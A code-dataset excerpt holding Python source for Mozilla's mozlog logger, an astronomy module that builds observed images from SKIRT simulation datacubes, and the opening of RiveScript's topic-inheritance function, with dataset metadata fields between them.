fmt = '%(asctime)s ' + fmt
# this protected member is used to define the format
# used by the base Formatter's method
self._fmt = fmt
return Formatter.format(self, record)
def getLogger(name, handler=None):
"""
Returns the logger with the specified name.
If the logger doesn't exist, it is created.
If handler is specified, adds it to the logger. Otherwise a default handler
that logs to standard output will be used.
:param name: The name of the logger to retrieve
:param handler: A handler to add to the logger. If the logger already exists,
and a handler is specified, an exception will be raised. To
add a handler to an existing logger, call that logger's
addHandler method.
"""
setLoggerClass(MozLogger)
if name in Logger.manager.loggerDict:
if handler:
raise ValueError('The handler parameter requires ' + \
'that a logger by this name does ' + \
'not already exist')
return Logger.manager.loggerDict[name]
logger = getSysLogger(name)
logger.setLevel(_default_level)
if handler is None:
handler = StreamHandler()
handler.setFormatter(MozFormatter())
logger.addHandler(handler)
logger.propagate = False
return logger
| <filename>mozmill-env/python/Lib/site-packages/mozlog/logger.py<gh_stars>0
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
from logging import getLogger as getSysLogger
from logging import *
# Some of the build slave environments don't see the following when doing
# 'from logging import *'
# see https://bugzilla.mozilla.org/show_bug.cgi?id=700415#c35
from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig
import json
_default_level = INFO
_LoggerClass = getLoggerClass()
# Define mozlog specific log levels
START = _default_level + 1
END = _default_level + 2
PASS = _default_level + 3
KNOWN_FAIL = _default_level + 4
FAIL = _default_level + 5
CRASH = _default_level + 6
# Define associated text of log levels
addLevelName(START, 'TEST-START')
addLevelName(END, 'TEST-END')
addLevelName(PASS, 'TEST-PASS')
addLevelName(KNOWN_FAIL, 'TEST-KNOWN-FAIL')
addLevelName(FAIL, 'TEST-UNEXPECTED-FAIL')
addLevelName(CRASH, 'PROCESS-CRASH')
class MozLogger(_LoggerClass):
"""
MozLogger class which adds some convenience log levels
related to automated testing in Mozilla and ability to
output structured log messages.
"""
def testStart(self, message, *args, **kwargs):
"""Logs a test start message"""
self.log(START, message, *args, **kwargs)
def testEnd(self, message, *args, **kwargs):
"""Logs a test end message"""
self.log(END, message, *args, **kwargs)
def testPass(self, message, *args, **kwargs):
"""Logs a test pass message"""
self.log(PASS, message, *args, **kwargs)
def testFail(self, message, *args, **kwargs):
"""Logs a test fail message"""
self.log(FAIL, message, *args, **kwargs)
def testKnownFail(self, message, *args, **kwargs):
"""Logs a test known fail message"""
self.log(KNOWN_FAIL, message, *args, **kwargs)
def processCrash(self, message, *args, **kwargs):
"""Logs a process crash message"""
self.log(CRASH, message, *args, **kwargs)
def log_structured(self, action, params=None):
"""Logs a structured message object."""
if params is None:
params = {}
level = params.get('_level', _default_level)
if isinstance(level, int):
params['_level'] = getLevelName(level)
else:
params['_level'] = level
level = getLevelName(level.upper())
# If the logger is fed a level number unknown to the logging
# module, getLevelName will return a string. Unfortunately,
# the logging module will raise a type error elsewhere if
# the level is not an integer.
if not isinstance(level, int):
level = _default_level
params['action'] = action
# The can message be None. This is expected, and shouldn't cause
# unstructured formatters to fail.
message = params.get('_message')
self.log(level, message, extra={'params': params})
class JSONFormatter(Formatter):
"""Log formatter for emitting structured JSON entries."""
def format(self, record):
# Default values determined by logger metadata
output = {
'_time': int(round(record.created * 1000, 0)),
'_namespace': record.name,
'_level': getLevelName(record.levelno),
}
# If this message was created by a call to log_structured,
# anything specified by the caller's params should act as
# an override.
output.update(getattr(record, 'params', {}))
if record.msg and output.get('_message') is None:
# For compatibility with callers using the printf like
# API exposed by python logging, call the default formatter.
output['_message'] = Formatter.format(self, record)
return json.dumps(output, indent=output.get('indent'))
class MozFormatter(Formatter):
"""
MozFormatter class used to standardize formatting
If a different format is desired, this can be explicitly
overriden with the log handler's setFormatter() method
"""
level_length = 0
max_level_length = len('TEST-START')
def __init__(self, include_timestamp=False):
"""
Formatter.__init__ has fmt and datefmt parameters that won't have
any affect on a MozFormatter instance.
:param include_timestamp: if True, include formatted time at the
beginning of the message
"""
self.include_timestamp = include_timestamp
Formatter.__init__(self)
def format(self, record):
# Handles padding so record levels align nicely
if len(record.levelname) > self.level_length:
pad = 0
if len(record.levelname) <= self.max_level_length:
self.level_length = len(record.levelname)
else:
pad = self.level_length - len(record.levelname) + 1
sep = '|'.rjust(pad)
fmt = '%(name)s %(levelname)s ' + sep + ' %(message)s'
if self.include_timestamp:
fmt = '%(asctime)s ' + fmt
# this protected member is used to define the format
# used by the base Formatter's method
self._fmt = fmt
return Formatter.format(self, record)
def getLogger(name, handler=None):
"""
Returns the logger with the specified name.
If the logger doesn't exist, it is created.
If handler is specified, adds it to the logger. Otherwise a default handler
that logs to standard output will be used.
:param name: The name of the logger to retrieve
:param handler: A handler to add to the logger. If the logger already exists,
and a handler is specified, an exception will be raised. To
add a handler to an existing logger, call that logger's
addHandler method.
"""
setLoggerClass(MozLogger)
if name in Logger.manager.loggerDict:
if handler:
raise ValueError('The handler parameter requires ' + \
'that a logger by this name does ' + \
'not already exist')
return Logger.manager.loggerDict[name]
logger = getSysLogger(name)
logger.setLevel(_default_level)
if handler is None:
handler = StreamHandler()
handler.setFormatter(MozFormatter())
logger.addHandler(handler)
logger.propagate = False
return logger
| en | 0.771504 | # This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this file, # You can obtain one at http://mozilla.org/MPL/2.0/. # Some of the build slave environments don't see the following when doing # 'from logging import *' # see https://bugzilla.mozilla.org/show_bug.cgi?id=700415#c35 # Define mozlog specific log levels # Define associated text of log levels MozLogger class which adds some convenience log levels related to automated testing in Mozilla and ability to output structured log messages. Logs a test start message Logs a test end message Logs a test pass message Logs a test fail message Logs a test known fail message Logs a process crash message Logs a structured message object. # If the logger is fed a level number unknown to the logging # module, getLevelName will return a string. Unfortunately, # the logging module will raise a type error elsewhere if # the level is not an integer. # The can message be None. This is expected, and shouldn't cause # unstructured formatters to fail. Log formatter for emitting structured JSON entries. # Default values determined by logger metadata # If this message was created by a call to log_structured, # anything specified by the caller's params should act as # an override. # For compatibility with callers using the printf like # API exposed by python logging, call the default formatter. MozFormatter class used to standardize formatting If a different format is desired, this can be explicitly overriden with the log handler's setFormatter() method Formatter.__init__ has fmt and datefmt parameters that won't have any affect on a MozFormatter instance. :param include_timestamp: if True, include formatted time at the beginning of the message # Handles padding so record levels align nicely # this protected member is used to define the format # used by the base Formatter's method Returns the logger with the specified name. If the logger doesn't exist, it is created. If handler is specified, adds it to the logger. Otherwise a default handler that logs to standard output will be used. :param name: The name of the logger to retrieve :param handler: A handler to add to the logger. If the logger already exists, and a handler is specified, an exception will be raised. To add a handler to an existing logger, call that logger's addHandler method. | 2.328867 | 2 |
CAAPR/CAAPR_AstroMagic/PTS/pts/core/misc/images.py | wdobbels/CAAPR | 7 | 9173 | #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.core.misc.fluxes Contains the ObservedImageMaker class.
# -----------------------------------------------------------------
# Ensure Python 3 compatibility
from __future__ import absolute_import, division, print_function
# Import astronomical modules
from astropy.units import Unit
from astropy import constants
# Import the relevant PTS classes and modules
from ..tools.logging import log
from ..tools import filesystem as fs
from ..basics.filter import Filter
from ...magic.core.image import Image
from ...magic.core.frame import Frame
from ...magic.basics.coordinatesystem import CoordinateSystem
from ..tools.special import remote_filter_convolution, remote_convolution_frame
# -----------------------------------------------------------------
# The speed of light
speed_of_light = constants.c
# -----------------------------------------------------------------
class ObservedImageMaker(object):
"""
This class ...
"""
def __init__(self):
"""
The constructor ...
:return:
"""
# Call the constructor of the base class
super(ObservedImageMaker, self).__init__()
# -- Attributes --
# The simulation prefix
self.simulation_prefix = None
# The paths to the 'total' FITS files produced by SKIRT
self.fits_paths = None
# The wavelengths of the simulation
self.wavelengths = None
# Filter names
self.filter_names = ["FUV", "NUV", "u", "g", "r", "i", "z", "H", "J", "Ks", "I1", "I2", "I3", "I4", "W1", "W2",
"W3", "W4", "Pacs 70", "Pacs 100", "Pacs 160", "SPIRE 250", "SPIRE 350", "SPIRE 500"]
# The instrument names
self.instrument_names = None
# The filters for which the images should be created
self.filters = dict()
# The dictionary containing the images for various SKIRT output datacubes
self.images = dict()
# The reference WCS
self.wcs = None
# -----------------------------------------------------------------
def run(self, simulation, output_path=None, filter_names=None, instrument_names=None, wcs_path=None, kernel_paths=None, unit=None, host_id=None):
"""
This function ...
:param simulation:
:param output_path:
:param filter_names:
:param instrument_names:
:param wcs_path:
:param kernel_paths:
:param unit:
:param host_id:
:return:
"""
# Obtain the paths to the 'total' FITS files created by the simulation
self.fits_paths = simulation.totalfitspaths()
# Get the list of wavelengths for the simulation
self.wavelengths = simulation.wavelengths()
# Get the simulation prefix
self.simulation_prefix = simulation.prefix()
# Set the filter names
if filter_names is not None: self.filter_names = filter_names
# Set the instrument names
self.instrument_names = instrument_names
# Create the filters
self.create_filters()
# Make the observed images
self.make_images(host_id)
# Set the WCS of the created images
if wcs_path is not None: self.set_wcs(wcs_path)
# Convolve the image with a given convolution kernel
if kernel_paths is not None:
# Check whether the WCS for the image is defined. If not, show a warning and skip the convolution
if wcs_path is None: log.warning("WCS of the image is not defined, so convolution cannot be performed (the pixelscale is undefined)")
else: self.convolve(kernel_paths, host_id)
# Convert the units (WCS has to be loaded!)
if unit is not None: self.convert_units(unit)
# Write the results
if output_path is not None: self.write(output_path)
# -----------------------------------------------------------------
def create_filters(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Constructing the filter objects ...")
# Loop over the different filter names
for filter_name in self.filter_names:
# Debugging
log.debug("Constructing the " + filter_name + " filter ...")
# Create the filter
fltr = Filter.from_string(filter_name)
# Add the filter to the list
self.filters[filter_name] = fltr
# -----------------------------------------------------------------
def make_images(self, host_id=None):
"""
This function ...
:param host_id:
:return:
"""
# Inform the user
log.info("Making the observed images (this may take a while) ...")
# Loop over the different simulated images
for path in self.fits_paths:
# Get the name of the instrument
instr_name = instrument_name(path, self.simulation_prefix)
# If a list of instruments is defined an this instrument is not in this list, skip it
if self.instrument_names is not None and instr_name not in self.instrument_names: continue
# Get the name of the datacube (as given by SKIRT)
datacube_name = fs.strip_extension(fs.name(path))
# Debugging
log.debug("Making the observed images for " + datacube_name + ".fits ...")
# Create a dictionary to contain the observed images for this FITS file
images = dict()
# The filter convolution is performed remotely
if host_id is not None:
# Upload the datacube, wavelength grid and filter properties, perform the convolution on the remote and get the resulting image frames back (as a dictionary where the keys are the filter names)
frames = remote_filter_convolution(host_id, path, self.wavelengths, self.filters)
# Add the resulting image frames to the dictionary
for filter_name in frames:
# Add the observed image to the dictionary
images[filter_name] = frames[filter_name]
# The calculation is performed locally
else:
# Load the simulated image
datacube = Image.from_file(path, always_call_first_primary=False)
# Convert the frames from neutral surface brightness to wavelength surface brightness
for l in range(len(self.wavelengths)):
# Get the wavelength
wavelength = self.wavelengths[l]
# Determine the name of the frame in the datacube
frame_name = "frame" + str(l)
# Divide this frame by the wavelength in micron
datacube.frames[frame_name] /= wavelength
# Set the new unit
datacube.frames[frame_name].unit = "W / (m2 * arcsec2 * micron)"
# Convert the datacube to a numpy array where wavelength is the third dimension
fluxdensities = datacube.asarray()
# Loop over the different filters
for filter_name in self.filters:
fltr = self.filters[filter_name]
# Debugging
log.debug("Making the observed image for the " + str(fltr) + " filter ...")
# Calculate the observed image frame
data = fltr.convolve(self.wavelengths, fluxdensities)
frame = Frame(data)
# Set the unit of the frame
frame.unit = "W/(m2 * arcsec2 * micron)"
# Add the observed image to the dictionary
images[filter_name] = frame
# Add the dictionary of images of the current datacube to the complete images dictionary (with the datacube name as a key)
self.images[datacube_name] = images
# -----------------------------------------------------------------
def set_wcs(self, wcs_path):
"""
This function ...
:param wcs_path:
:return:
"""
# TODO: allow multiple paths (in a dictionary) for the different datacubes (so that for certain instruments the WCS should not be set on the simulated images)
# Inform the user
log.info("Setting the WCS of the simulated images ...")
# Debugging
log.debug("Loading the coordinate system from '" + wcs_path + "' ...")
# Load the WCS
self.wcs = CoordinateSystem.from_file(wcs_path)
# Loop over the different images and set the WCS
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Debugging
log.debug("Setting the coordinate system of the " + filter_name + " image of the '" + datacube_name + "' instrument ...")
# Set the coordinate system for this frame
self.images[datacube_name][filter_name].wcs = self.wcs
# -----------------------------------------------------------------
def convolve(self, kernel_paths, host_id=None):
"""
This function ...
:param kernel_paths:
:param host_id:
:return:
"""
# Inform the user
log.info("Convolving the images ...")
# If the convolutions must be performed remotely
if host_id is not None:
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve.
if filter_name not in kernel_paths or kernel_paths[filter_name] is None: continue
# Determine the kernel path for this image
kernel_path = kernel_paths[filter_name]
# Perform the remote convolution
self.images[datacube_name][filter_name] = remote_convolution_frame(self.images[datacube_name][filter_name], kernel_path, host_id)
# The convolution is performed locally
else:
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve.
if filter_name not in kernel_paths or kernel_paths[filter_name] is None: continue
# Load the kernel
kernel = Frame.from_file(kernel_paths[filter_name])
# Debugging
log.debug("Convolving the '" + filter_name + "' image of the '" + datacube_name + "' instrument ...")
# Convolve this image frame
self.images[datacube_name][filter_name].convolve(kernel)
# -----------------------------------------------------------------
def convert_units(self, unit):
"""
This function ...
:param self:
:param unit:
:return:
"""
# TODO: right now, this is just an implementation of the conversion from W / (m2 * arcsec2 * micron) to MJy/sr
# 1 Jy = 1e-26 * W / (m2 * Hz)
# Inform the user
log.info("Converting the units of the images to " + str(unit) + " ...")
# Get the pixelscale
#pixelscale = self.wcs.average_pixelscale.to("arcsec/pix").value # in arcsec**2 / pixel
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Debugging
log.debug("Converting the unit of the " + filter_name + " image of the '" + datacube_name + "' instrument ...")
# Get the pivot wavelength of the filter
fltr = self.filters[filter_name]
pivot = fltr.pivotwavelength() * Unit("micron")
# Determine the conversion factor
conversion_factor = 1.0
# From surface brightness to flux density (no)
#conversion_factor *=
# From W / (m2 * arcsec2 * micron) to W / (m2 * arcsec2 * Hz)
conversion_factor *= (pivot ** 2 / speed_of_light).to("micron/Hz").value
# From W / (m2 * arcsec2 * Hz) to MJy / sr
#conversion_factor *= (Unit("W/(m2 * arcsec2 * Hz)") / Unit("MJy/sr")).to("")
conversion_factor *= 1e26 * 1e-6 * (Unit("sr") / Unit("arcsec2")).to("")
# Convert
self.images[datacube_name][filter_name] *= conversion_factor
self.images[datacube_name][filter_name].unit = "MJy/sr"
# -----------------------------------------------------------------
def write(self, output_path):
"""
This function ...
:param output_path:
:return:
"""
# Inform the user
log.info("Writing the images ...")
# Loop over the different images (self.images is a nested dictionary of dictionaries)
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Determine the path to the output FITS file
path = fs.join(output_path, datacube_name + "__" + filter_name + ".fits")
# Save the image
self.images[datacube_name][filter_name].save(path)
# -----------------------------------------------------------------
def instrument_name(datacube_path, prefix):
"""
This function ...
:param datacube_path:
:param prefix:
:return:
"""
return fs.name(datacube_path).split("_total.fits")[0].split(prefix + "_")[1]
# -----------------------------------------------------------------
| #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.core.misc.fluxes Contains the ObservedImageMaker class.
# -----------------------------------------------------------------
# Ensure Python 3 compatibility
from __future__ import absolute_import, division, print_function
# Import astronomical modules
from astropy.units import Unit
from astropy import constants
# Import the relevant PTS classes and modules
from ..tools.logging import log
from ..tools import filesystem as fs
from ..basics.filter import Filter
from ...magic.core.image import Image
from ...magic.core.frame import Frame
from ...magic.basics.coordinatesystem import CoordinateSystem
from ..tools.special import remote_filter_convolution, remote_convolution_frame
# -----------------------------------------------------------------
# The speed of light
speed_of_light = constants.c
# -----------------------------------------------------------------
class ObservedImageMaker(object):
"""
This class ...
"""
def __init__(self):
"""
The constructor ...
:return:
"""
# Call the constructor of the base class
super(ObservedImageMaker, self).__init__()
# -- Attributes --
# The simulation prefix
self.simulation_prefix = None
# The paths to the 'total' FITS files produced by SKIRT
self.fits_paths = None
# The wavelengths of the simulation
self.wavelengths = None
# Filter names
self.filter_names = ["FUV", "NUV", "u", "g", "r", "i", "z", "H", "J", "Ks", "I1", "I2", "I3", "I4", "W1", "W2",
"W3", "W4", "Pacs 70", "Pacs 100", "Pacs 160", "SPIRE 250", "SPIRE 350", "SPIRE 500"]
# The instrument names
self.instrument_names = None
# The filters for which the images should be created
self.filters = dict()
# The dictionary containing the images for various SKIRT output datacubes
self.images = dict()
# The reference WCS
self.wcs = None
# -----------------------------------------------------------------
def run(self, simulation, output_path=None, filter_names=None, instrument_names=None, wcs_path=None, kernel_paths=None, unit=None, host_id=None):
"""
This function ...
:param simulation:
:param output_path:
:param filter_names:
:param instrument_names:
:param wcs_path:
:param kernel_paths:
:param unit:
:param host_id:
:return:
"""
# Obtain the paths to the 'total' FITS files created by the simulation
self.fits_paths = simulation.totalfitspaths()
# Get the list of wavelengths for the simulation
self.wavelengths = simulation.wavelengths()
# Get the simulation prefix
self.simulation_prefix = simulation.prefix()
# Set the filter names
if filter_names is not None: self.filter_names = filter_names
# Set the instrument names
self.instrument_names = instrument_names
# Create the filters
self.create_filters()
# Make the observed images
self.make_images(host_id)
# Set the WCS of the created images
if wcs_path is not None: self.set_wcs(wcs_path)
# Convolve the image with a given convolution kernel
if kernel_paths is not None:
# Check whether the WCS for the image is defined. If not, show a warning and skip the convolution
if wcs_path is None: log.warning("WCS of the image is not defined, so convolution cannot be performed (the pixelscale is undefined)")
else: self.convolve(kernel_paths, host_id)
# Convert the units (WCS has to be loaded!)
if unit is not None: self.convert_units(unit)
# Write the results
if output_path is not None: self.write(output_path)
# -----------------------------------------------------------------
def create_filters(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Constructing the filter objects ...")
# Loop over the different filter names
for filter_name in self.filter_names:
# Debugging
log.debug("Constructing the " + filter_name + " filter ...")
# Create the filter
fltr = Filter.from_string(filter_name)
# Add the filter to the list
self.filters[filter_name] = fltr
# -----------------------------------------------------------------
def make_images(self, host_id=None):
"""
This function ...
:param host_id:
:return:
"""
# Inform the user
log.info("Making the observed images (this may take a while) ...")
# Loop over the different simulated images
for path in self.fits_paths:
# Get the name of the instrument
instr_name = instrument_name(path, self.simulation_prefix)
# If a list of instruments is defined an this instrument is not in this list, skip it
if self.instrument_names is not None and instr_name not in self.instrument_names: continue
# Get the name of the datacube (as given by SKIRT)
datacube_name = fs.strip_extension(fs.name(path))
# Debugging
log.debug("Making the observed images for " + datacube_name + ".fits ...")
# Create a dictionary to contain the observed images for this FITS file
images = dict()
# The filter convolution is performed remotely
if host_id is not None:
# Upload the datacube, wavelength grid and filter properties, perform the convolution on the remote and get the resulting image frames back (as a dictionary where the keys are the filter names)
frames = remote_filter_convolution(host_id, path, self.wavelengths, self.filters)
# Add the resulting image frames to the dictionary
for filter_name in frames:
# Add the observed image to the dictionary
images[filter_name] = frames[filter_name]
# The calculation is performed locally
else:
# Load the simulated image
datacube = Image.from_file(path, always_call_first_primary=False)
# Convert the frames from neutral surface brightness to wavelength surface brightness
for l in range(len(self.wavelengths)):
# Get the wavelength
wavelength = self.wavelengths[l]
# Determine the name of the frame in the datacube
frame_name = "frame" + str(l)
# Divide this frame by the wavelength in micron
datacube.frames[frame_name] /= wavelength
# Set the new unit
datacube.frames[frame_name].unit = "W / (m2 * arcsec2 * micron)"
# Convert the datacube to a numpy array where wavelength is the third dimension
fluxdensities = datacube.asarray()
# Loop over the different filters
for filter_name in self.filters:
fltr = self.filters[filter_name]
# Debugging
log.debug("Making the observed image for the " + str(fltr) + " filter ...")
# Calculate the observed image frame
data = fltr.convolve(self.wavelengths, fluxdensities)
frame = Frame(data)
# Set the unit of the frame
frame.unit = "W/(m2 * arcsec2 * micron)"
# Add the observed image to the dictionary
images[filter_name] = frame
# Add the dictionary of images of the current datacube to the complete images dictionary (with the datacube name as a key)
self.images[datacube_name] = images
# -----------------------------------------------------------------
def set_wcs(self, wcs_path):
"""
This function ...
:param wcs_path:
:return:
"""
# TODO: allow multiple paths (in a dictionary) for the different datacubes (so that for certain instruments the WCS should not be set on the simulated images)
# Inform the user
log.info("Setting the WCS of the simulated images ...")
# Debugging
log.debug("Loading the coordinate system from '" + wcs_path + "' ...")
# Load the WCS
self.wcs = CoordinateSystem.from_file(wcs_path)
# Loop over the different images and set the WCS
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Debugging
log.debug("Setting the coordinate system of the " + filter_name + " image of the '" + datacube_name + "' instrument ...")
# Set the coordinate system for this frame
self.images[datacube_name][filter_name].wcs = self.wcs
# -----------------------------------------------------------------
def convolve(self, kernel_paths, host_id=None):
"""
This function ...
:param kernel_paths:
:param host_id:
:return:
"""
# Inform the user
log.info("Convolving the images ...")
# If the convolutions must be performed remotely
if host_id is not None:
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve.
if filter_name not in kernel_paths or kernel_paths[filter_name] is None: continue
# Determine the kernel path for this image
kernel_path = kernel_paths[filter_name]
# Perform the remote convolution
self.images[datacube_name][filter_name] = remote_convolution_frame(self.images[datacube_name][filter_name], kernel_path, host_id)
# The convolution is performed locally
else:
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve.
if filter_name not in kernel_paths or kernel_paths[filter_name] is None: continue
# Load the kernel
kernel = Frame.from_file(kernel_paths[filter_name])
# Debugging
log.debug("Convolving the '" + filter_name + "' image of the '" + datacube_name + "' instrument ...")
# Convolve this image frame
self.images[datacube_name][filter_name].convolve(kernel)
# -----------------------------------------------------------------
def convert_units(self, unit):
"""
This function ...
:param self:
:param unit:
:return:
"""
# TODO: right now, this is just an implementation of the conversion from W / (m2 * arcsec2 * micron) to MJy/sr
# 1 Jy = 1e-26 * W / (m2 * Hz)
# Inform the user
log.info("Converting the units of the images to " + str(unit) + " ...")
# Get the pixelscale
#pixelscale = self.wcs.average_pixelscale.to("arcsec/pix").value # in arcsec**2 / pixel
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Debugging
log.debug("Converting the unit of the " + filter_name + " image of the '" + datacube_name + "' instrument ...")
# Get the pivot wavelength of the filter
fltr = self.filters[filter_name]
pivot = fltr.pivotwavelength() * Unit("micron")
# Determine the conversion factor
conversion_factor = 1.0
# From surface brightness to flux density (no)
#conversion_factor *=
# From W / (m2 * arcsec2 * micron) to W / (m2 * arcsec2 * Hz)
conversion_factor *= (pivot ** 2 / speed_of_light).to("micron/Hz").value
# From W / (m2 * arcsec2 * Hz) to MJy / sr
#conversion_factor *= (Unit("W/(m2 * arcsec2 * Hz)") / Unit("MJy/sr")).to("")
conversion_factor *= 1e26 * 1e-6 * (Unit("sr") / Unit("arcsec2")).to("")
# Convert
self.images[datacube_name][filter_name] *= conversion_factor
self.images[datacube_name][filter_name].unit = "MJy/sr"
# -----------------------------------------------------------------
def write(self, output_path):
"""
This function ...
:param output_path:
:return:
"""
# Inform the user
log.info("Writing the images ...")
# Loop over the different images (self.images is a nested dictionary of dictionaries)
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Determine the path to the output FITS file
path = fs.join(output_path, datacube_name + "__" + filter_name + ".fits")
# Save the image
self.images[datacube_name][filter_name].save(path)
# -----------------------------------------------------------------
def instrument_name(datacube_path, prefix):
"""
This function ...
:param datacube_path:
:param prefix:
:return:
"""
return fs.name(datacube_path).split("_total.fits")[0].split(prefix + "_")[1]
# -----------------------------------------------------------------
| en | 0.659521 | #!/usr/bin/env python # -*- coding: utf8 -*- # ***************************************************************** # ** PTS -- Python Toolkit for working with SKIRT ** # ** © Astronomical Observatory, Ghent University ** # ***************************************************************** ## \package pts.core.misc.fluxes Contains the ObservedImageMaker class. # ----------------------------------------------------------------- # Ensure Python 3 compatibility # Import astronomical modules # Import the relevant PTS classes and modules # ----------------------------------------------------------------- # The speed of light # ----------------------------------------------------------------- This class ... The constructor ... :return: # Call the constructor of the base class # -- Attributes -- # The simulation prefix # The paths to the 'total' FITS files produced by SKIRT # The wavelengths of the simulation # Filter names # The instrument names # The filters for which the images should be created # The dictionary containing the images for various SKIRT output datacubes # The reference WCS # ----------------------------------------------------------------- This function ... :param simulation: :param output_path: :param filter_names: :param instrument_names: :param wcs_path: :param kernel_paths: :param unit: :param host_id: :return: # Obtain the paths to the 'total' FITS files created by the simulation # Get the list of wavelengths for the simulation # Get the simulation prefix # Set the filter names # Set the instrument names # Create the filters # Make the observed images # Set the WCS of the created images # Convolve the image with a given convolution kernel # Check whether the WCS for the image is defined. If not, show a warning and skip the convolution # Convert the units (WCS has to be loaded!) # Write the results # ----------------------------------------------------------------- This function ... :return: # Inform the user # Loop over the different filter names # Debugging # Create the filter # Add the filter to the list # ----------------------------------------------------------------- This function ... :param host_id: :return: # Inform the user # Loop over the different simulated images # Get the name of the instrument # If a list of instruments is defined an this instrument is not in this list, skip it # Get the name of the datacube (as given by SKIRT) # Debugging # Create a dictionary to contain the observed images for this FITS file # The filter convolution is performed remotely # Upload the datacube, wavelength grid and filter properties, perform the convolution on the remote and get the resulting image frames back (as a dictionary where the keys are the filter names) # Add the resulting image frames to the dictionary # Add the observed image to the dictionary # The calculation is performed locally # Load the simulated image # Convert the frames from neutral surface brightness to wavelength surface brightness # Get the wavelength # Determine the name of the frame in the datacube # Divide this frame by the wavelength in micron # Set the new unit # Convert the datacube to a numpy array where wavelength is the third dimension # Loop over the different filters # Debugging # Calculate the observed image frame # Set the unit of the frame # Add the observed image to the dictionary # Add the dictionary of images of the current datacube to the complete images dictionary (with the datacube name as a key) # ----------------------------------------------------------------- This function ... :param wcs_path: :return: # TODO: allow multiple paths (in a dictionary) for the different datacubes (so that for certain instruments the WCS should not be set on the simulated images) # Inform the user # Debugging # Load the WCS # Loop over the different images and set the WCS # Debugging # Set the coordinate system for this frame # ----------------------------------------------------------------- This function ... :param kernel_paths: :param host_id: :return: # Inform the user # If the convolutions must be performed remotely # Loop over the images # Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve. # Determine the kernel path for this image # Perform the remote convolution # The convolution is performed locally # Loop over the images # Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve. # Load the kernel # Debugging # Convolve this image frame # ----------------------------------------------------------------- This function ... :param self: :param unit: :return: # TODO: right now, this is just an implementation of the conversion from W / (m2 * arcsec2 * micron) to MJy/sr # 1 Jy = 1e-26 * W / (m2 * Hz) # Inform the user # Get the pixelscale #pixelscale = self.wcs.average_pixelscale.to("arcsec/pix").value # in arcsec**2 / pixel # Loop over the images # Debugging # Get the pivot wavelength of the filter # Determine the conversion factor # From surface brightness to flux density (no) #conversion_factor *= # From W / (m2 * arcsec2 * micron) to W / (m2 * arcsec2 * Hz) # From W / (m2 * arcsec2 * Hz) to MJy / sr #conversion_factor *= (Unit("W/(m2 * arcsec2 * Hz)") / Unit("MJy/sr")).to("") # Convert # ----------------------------------------------------------------- This function ... :param output_path: :return: # Inform the user # Loop over the different images (self.images is a nested dictionary of dictionaries) # Determine the path to the output FITS file # Save the image # ----------------------------------------------------------------- This function ... :param datacube_path: :param prefix: :return: # ----------------------------------------------------------------- | 1.921061 | 2 |
venv/Lib/site-packages/rivescript/inheritance.py | Hazemcodes/GimmyBot | 154 | 9174 | # RiveScript-Python
#
# This code is released under the MIT License.
# See the "LICENSE" file for more information.
#
# https://www.rivescript.com/
def get_topic_triggers(rs, topic, thats, depth=0, inheritance=0, inherited=False):
"""Recursively scan a topic and return a list of all triggers.
Arguments:
rs (RiveScript): A reference to the parent RiveScript instance.
topic (str): The original topic name.
thats (bool): Are we getting triggers for 'previous' replies?
depth (int): Recursion step counter.
inheritance (int): The inheritance level counter, for topics that
inherit other topics.
inherited (bool): Whether the current topic is inherited by others.
Returns:
[]str: List of all triggers found.
"""
# Break if we're in too deep.
if depth > rs._depth:
rs._warn("Deep recursion while scanning topic inheritance")
# Keep in mind here that there is a difference between 'includes' and
# 'inherits' -- topics that inherit other topics are able to OVERRIDE
# triggers that appear in the inherited topic. This means that if the top
# topic has a trigger of simply '*', then NO triggers are capable of
# matching in ANY inherited topic, because even though * has the lowest
# priority, it has an automatic priority over all inherited topics.
#
# The getTopicTriggers method takes this into account. All topics that
# inherit other topics will have their triggers prefixed with a fictional
# {inherits} tag, which would start at {inherits=0} and increment if this
# topic has other inheriting topics. So we can use this tag to make sure
# topics that inherit things will have their triggers always be on top of
# the stack, from inherits=0 to inherits=n.
# Important info about the depth vs inheritance params to this function:
# depth increments by 1 each time this function recursively calls itrs.
# inheritance increments by 1 only when this topic inherits another
# topic.
#
# This way, '> topic alpha includes beta inherits gamma' will have this
# effect:
# alpha and beta's triggers are combined together into one matching
# pool, and then those triggers have higher matching priority than
# gamma's.
#
# The inherited option is True if this is a recursive call, from a topic
# that inherits other topics. This forces the {inherits} tag to be added
# to the triggers. This only applies when the top topic 'includes'
# another topic.
rs._say("\tCollecting trigger list for topic " + topic + "(depth="
+ str(depth) + "; inheritance=" + str(inheritance) + "; "
+ "inherited=" + str(inherited) + ")")
# topic: the name of the topic
# depth: starts at 0 and ++'s with each recursion
# Topic doesn't exist?
